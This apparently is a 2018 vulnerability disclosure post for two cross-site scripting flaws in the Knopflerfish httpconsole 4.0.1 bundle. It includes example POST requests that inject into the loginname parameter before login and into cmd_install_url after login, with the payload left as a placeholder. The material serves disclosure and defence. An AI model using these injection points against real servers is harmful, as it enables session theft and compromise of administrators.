Tuesday, July 24, 2018

Knopflerfish bundle httpconsole 4.0.1 XSS

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[x] Type: Cross Site Scripting x2
[x] Vendor: Knopflerfish Project
[x] Vendor Website: https://www.knopflerfish.org
[x] Bundle Name: httpconsole
[x] Bundle Version: 4.0.1
[x] Bundle DL: https://www.knopflerfish.org/releases/current/osgi/jars/httpconsole/httpconsole_all-4.0.1.jar
[x] Found by: Anarchy Angel
[x] Twitter: @anarchyang31
[x] URL: https://aahideaway.blogspot.com
[x] Mail : anarchy[dot]ang31@gmail[dot]com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[1] Pre-authentication XSS in login page.
Method: POST
URL: http://knopflerfish-server:8080/servlet/console
Variable: loginname

exp:
POST /servlet/console HTTP/1.1
Host: http://knopflerfish-server:8080
...

loginname=[XSS]&loginpwd=asd&login_cmd=Login
====


[2] Post authentication XSS in management console.
Method: POST
URL: http://knopflerfish-server:8080/servlet/console
Variable: cmd_install_url

exp:
POST /servlet/console HTTP/1.1
Host: http://knopflerfish-server:8080
...

bundle_id=29&cmd_install_url=[XSS]&cmd_installurl=install

Ummm firsties? :)